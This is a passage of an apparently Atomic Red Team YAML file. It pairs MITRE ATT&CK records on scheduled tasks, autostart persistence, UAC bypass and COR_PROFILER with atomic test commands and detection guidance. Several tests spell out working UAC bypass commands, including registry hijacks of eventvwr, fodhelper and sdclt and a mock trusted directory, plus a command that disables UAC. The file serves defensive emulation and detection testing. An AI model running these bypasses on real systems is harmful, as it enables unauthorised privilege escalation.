processes that have - not been seen before when compared against historical data. 
Data and events - should not be viewed in isolation, but as part of a chain of behavior that - could lead to other activities, such as network connections made for Command - and Control, learning details about the environment through Discovery, and - Lateral Movement." - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - identifier: T1053.001 - atomic_tests: - - name: At - Schedule a job - auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e - description: 'This test submits a command to be run in the future by the `at` - daemon. - -' - supported_platforms: - - linux - input_arguments: - time_spec: - description: Time specification of when the command should run - type: String - default: now + 1 minute - at_command: - description: The command to be run - type: String - default: echo Hello from Atomic Red Team - dependency_executor_name: sh - dependencies: - - description: 'The `at` and `atd` executables must exist in the PATH - -' - prereq_command: 'which at && which atd - -' - get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found - in the PATH (Package name: `at`)'' - -' - - description: 'The `atd` daemon must be running - -' - prereq_command: 'systemctl status atd || service atd status - -' - get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service - atd start` ; systemd: `systemctl start atd`)'' - -' - executor: - name: sh - elevation_required: false - command: 'echo "#{at_command}" | at #{time_spec} - -' - T1053.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.002 - url: https://attack.mitre.org/techniques/T1053/002 - - url: https://twitter.com/leoloobeek/status/939248813465853953 - description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved - December 12, 2017. 
- source_name: Twitter Leoloobeek Scheduled Task - - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen - description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention - settings. Retrieved December 12, 2017. - source_name: TechNet Forum Scheduled Task Operational Setting - - url: https://technet.microsoft.com/library/dd315590.aspx - description: Microsoft. (n.d.). General Task Registration. Retrieved December - 12, 2017. - source_name: TechNet Scheduled Task Events - - source_name: Microsoft Scheduled Task Events Win10 - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events - description: Microsoft. (2017, May 28). Audit Other Object Access Events. - Retrieved June 27, 2019. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: At (Windows) - description: "Adversaries may abuse the at.exe utility to perform - task scheduling for initial or recurring execution of malicious code. The - [at](https://attack.mitre.org/software/S0110) utility exists as an executable - within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) - requires that the Task Scheduler service be running, and the user to be logged - on as a member of the local Administrators group. \n\nAn adversary may use - at.exe in Windows environments to execute programs at system - startup or on a scheduled basis for persistence. 
[at](https://attack.mitre.org/software/S0110) - can also be abused to conduct remote Execution as part of Lateral Movement - and or to run a process under the context of a specified account (such as - SYSTEM).\n\nNote: The at.exe command line utility has been deprecated - in current versions of Windows in favor of schtasks." - id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:43:40.776Z' - created: '2019-11-27T13:52:45.853Z' - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. - - Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. 
(Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) - - * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered - * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated - * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted - * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created - * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled - * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) - - Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. - x_mitre_platforms: - - Windows - identifier: T1053.002 - atomic_tests: - - name: At.exe Scheduled task - auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 - description: | - Executes cmd.exe - Note: deprecated in Windows 8+ - - Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. 
- supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: false - command: 'at 13:20 /interactive cmd - -' - T1547.002: - technique: - id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec - description: |- - Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) - - Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. - name: Authentication Package - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.002 - url: https://attack.mitre.org/techniques/T1547/002 - - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx - description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, - 2017. - source_name: MSDN Authentication Packages - - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html - description: Graeber, M. (2014, October). Analysis of Malicious Security Support - Provider DLLs. Retrieved March 1, 2017. - source_name: Graeber 2014 - - url: https://technet.microsoft.com/en-us/library/dn408187.aspx - description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. - Retrieved June 24, 2015. 
- source_name: Microsoft Configure LSA - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:11:25.821Z' - created: '2020-01-24T14:54:42.757Z' - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - DLL monitoring - - Windows Registry - - Loaded DLLs - x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys. - Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 - R2 may generate events when unsigned DLLs try to load into the LSA by setting - the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber - 2014) (Citation: Microsoft Configure LSA)' - x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1547: - technique: - id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf - description: |- - Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. - - Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. 
- name: Boot or Logon Autostart Execution - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547 - url: https://attack.mitre.org/techniques/T1547 - - external_id: CAPEC-564 - source_name: capec - url: https://capec.mitre.org/data/definitions/564.html - - url: http://msdn.microsoft.com/en-us/library/aa376977 - description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November - 12, 2014. - source_name: Microsoft Run Key - - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx - description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, - 2017. - source_name: MSDN Authentication Packages - - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx - description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. - source_name: Microsoft TimeProvider - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 - - source_name: Linux Kernel Programming - url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf - description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel - Module Programming Guide. Retrieved April 6, 2018. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. 
- source_name: TechNet Autoruns - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T16:05:36.772Z' - created: '2020-01-23T17:46:59.535Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: "Monitor for additions or modifications of mechanisms that - could be used to trigger autostart execution, such as relevant additions to - the Registry. Look for changes that are not correlated with known updates, - patches, or other planned administrative activity. Tools such as Sysinternals - Autoruns may also be used to detect system autostart configuration changes - that could be attempts at persistence.(Citation: TechNet Autoruns) Changes - to some autostart configuration settings may happen under normal conditions - when legitimate software is installed. \n\nSuspicious program execution as - autostart programs may show up as outlier processes that have not been seen - before when compared against historical data.To increase confidence of malicious - activity, data and events should not be viewed in isolation, but as part of - a chain of behavior that could lead to other activities, such as network connections - made for Command and Control, learning details about the environment through - Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically - looking for DLLs that are not recognized or not normally loaded into a process. - Look for abnormal process behavior that may be due to a process loading a - malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line - parameters involved in kernel modification or driver installation." 
- x_mitre_permissions_required: - - User - - Administrator - - root - x_mitre_is_subtechnique: false - x_mitre_version: '1.1' - atomic_tests: [] - T1037: - technique: - id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Boot or Logon Initialization Scripts - description: "Adversaries may use scripts automatically executed at boot or - logon initialization to establish persistence. Initialization scripts can - be used to perform administrative functions, which may often execute other - programs or send information to an internal logging server. These scripts - can vary based on operating system and whether applied locally or remotely. - \ \n\nAdversaries may use these scripts to maintain persistence on a single - system. Depending on the access configuration of the logon scripts, either - local credentials or an administrator account may be necessary. \n\nAn adversary - may also be able to escalate their privileges since some boot or logon initialization - scripts run with higher privileges." - external_references: - - source_name: mitre-attack - external_id: T1037 - url: https://attack.mitre.org/techniques/T1037 - - external_id: CAPEC-564 - source_name: capec - url: https://capec.mitre.org/data/definitions/564.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-08-03T16:47:37.240Z' - created: '2017-05-31T21:30:38.910Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - macOS - - Windows - - Linux - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. 
Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_version: '2.1' - atomic_tests: [] - T1548.002: - technique: - id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 - description: |- - Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) - - If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) - - Many methods have been discovered to bypass UAC. 
The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: - - * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) - - Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) - name: Bypass User Account Control - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1548.002 - url: https://attack.mitre.org/techniques/T1548/002 - - url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works - description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved - June 3, 2016. - source_name: TechNet How UAC Works - - url: https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx - description: 'Russinovich, M. (2009, July). User Account Control: Inside Windows - 7 User Account Control. Retrieved July 26, 2016.' - source_name: TechNet Inside UAC - - url: https://msdn.microsoft.com/en-us/library/ms679687.aspx - description: Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July - 26, 2016. - source_name: MSDN COM Elevation - - url: http://www.pretentiousname.com/misc/win7_uac_whitelist2.html - description: Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November - 12, 2014. 
- source_name: Davidson Windows - - url: https://github.com/hfiref0x/UACME - description: UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. - source_name: Github UACMe - - url: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - description: Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe - and Registry Hijacking. Retrieved December 27, 2016. - source_name: enigma0x3 Fileless UAC Bypass - - url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware - description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses - UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. - source_name: Fortinet Fareit - - url: http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass - description: Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June - 3, 2016. - source_name: SANS UAC Bypass - - url: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ - description: Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved - May 25, 2017. - source_name: enigma0x3 sdclt app paths - - url: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ - description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. - Retrieved May 25, 2017. 
- source_name: enigma0x3 sdclt bypass - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-07-22T21:36:52.458Z' - created: '2020-01-30T14:24:34.977Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - - Casey Smith - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_detection: |- - There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. - - Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example: - - * The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass) - - * The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass) - - Analysts should monitor these Registry settings for unauthorized changes. 
- x_mitre_permissions_required: - - Administrator - - User - x_mitre_effective_permissions: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '2.0' - x_mitre_defense_bypassed: - - Windows User Account Control - identifier: T1548.002 - atomic_tests: - - name: Bypass UAC using Event Viewer (cmd) - auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 - description: | - Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - Upon execution command prompt should be launched with administrative privelages - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f - cmd.exe /c eventvwr.msc - cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - -' - name: command_prompt - - name: Bypass UAC using Event Viewer (PowerShell) - auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b - description: | - PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. 
More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - Upon execution command prompt should be launched with administrative privelages - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force - Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force - Start-Process "C:\Windows\System32\eventvwr.msc" - cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse - -ErrorAction Ignore - -' - name: powershell - - name: Bypass UAC using Fodhelper - auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 - description: | - Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f - reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f - fodhelper.exe - cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul - 2>&1 - -' - name: command_prompt - - name: Bypass UAC using Fodhelper - PowerShell - auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa - description: | - PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - Upon execution command prompt will be opened. 
- supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force - New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force - Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force - Start-Process "C:\Windows\System32\fodhelper.exe" - cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force - -Recurse -ErrorAction Ignore - -' - name: powershell - - name: Bypass UAC using ComputerDefaults (PowerShell) - auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f - description: | - PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 - Upon execution administrative command prompt should open - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force - New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force - Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force - Start-Process "C:\Windows\System32\ComputerDefaults.exe" - cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force - -Recurse -ErrorAction Ignore - -' - name: powershell - elevation_required: true - - name: Bypass UAC by Mocking Trusted Directories - auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1 - description: | - Creates a fake "trusted directory" and copies a binary to bypass UAC. 
The UAC bypass may not work on fully patched systems - Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch - supported_platforms: - - windows - input_arguments: - executable_binary: - description: Binary to execute with UAC Bypass - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - mkdir "\\?\C:\Windows \System32\" - copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe" - mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe" - cleanup_command: | - rd "\\?\C:\Windows \" /S /Q >nul 2>nul - del "c:\testbypass.exe" >nul 2>nul - name: command_prompt - elevation_required: true - - name: Bypass UAC using sdclt DelegateExecute - auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 - description: | - Bypasses User Account Control using a fileless method, registry only. - Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe - [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) - Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) - supported_platforms: - - windows - input_arguments: - command.to.execute: - description: Command to execute - type: string - default: cmd.exe /c notepad.exe - executor: - command: | - New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}' - New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" - Start-Process -FilePath $env:windir\system32\sdclt.exe - Start-Sleep -s 3 - cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse - -Force -ErrorAction Ignore - -' - name: powershell - - name: Disable UAC using reg.exe - auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 - description: | - Disable 
User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 - supported_platforms: - - windows - executor: - command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - /v EnableLUA /t REG_DWORD /d 0 /f - -' - cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - /v EnableLUA /t REG_DWORD /d 1 /f - -' - name: command_prompt - elevation_required: true - T1574.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.012 - url: https://attack.mitre.org/techniques/T1574/012 - - source_name: Microsoft Profiling Mar 2017 - url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview - description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June - 24, 2020. - - source_name: Microsoft COR_PROFILER Feb 2013 - url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100) - description: Microsoft. (2013, February 4). Registry-Free Profiler Startup - and Attach. Retrieved June 24, 2020. - - source_name: RedCanary Mockingbird May 2020 - url: https://redcanary.com/blog/blue-mockingbird-cryptominer/ - description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved - May 26, 2020. - - source_name: Red Canary COR_PROFILER May 2020 - url: https://redcanary.com/blog/cor_profiler-for-persistence/ - description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation - for persistence. Retrieved June 24, 2020. - - source_name: Almond COR_PROFILER Apr 2019 - url: https://offsec.almond.consulting/UAC-bypass-dotnet.html - description: Almond. (2019, April 30). UAC bypass via elevated .NET applications. - Retrieved June 24, 2020. - - source_name: GitHub OmerYa Invisi-Shell - url: https://github.com/OmerYa/Invisi-Shell - description: Yair, O. (2019, August 19). 
Invisi-Shell. Retrieved June 24, - 2020. - - source_name: subTee .NET Profilers May 2017 - url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html - description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET - Profilers. Retrieved June 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: COR_PROFILER - description: |- - Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) - - The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) - - Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. 
The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) - id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-26T16:09:58.920Z' - created: '2020-06-24T22:30:55.843Z' - x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER, - monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and - COR_PROFILER_PATH that correspond to system and user environment variables - that do not correlate to known developer tools. Extra scrutiny should be placed - on suspicious modification of these Registry keys by command line tools like - wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring - for command-line arguments indicating a change to COR_PROFILER variables may - aid in detection. For system, user, and process scope abuse of the COR_PROFILER, - monitor for new suspicious unmanaged profiling DLLs loading into .NET processes - shortly after the CLR causing abnormal process behavior.(Citation: Red Canary - COR_PROFILER May 2020) Consider monitoring for DLL files that are associated - with COR_PROFILER environment variables.' 
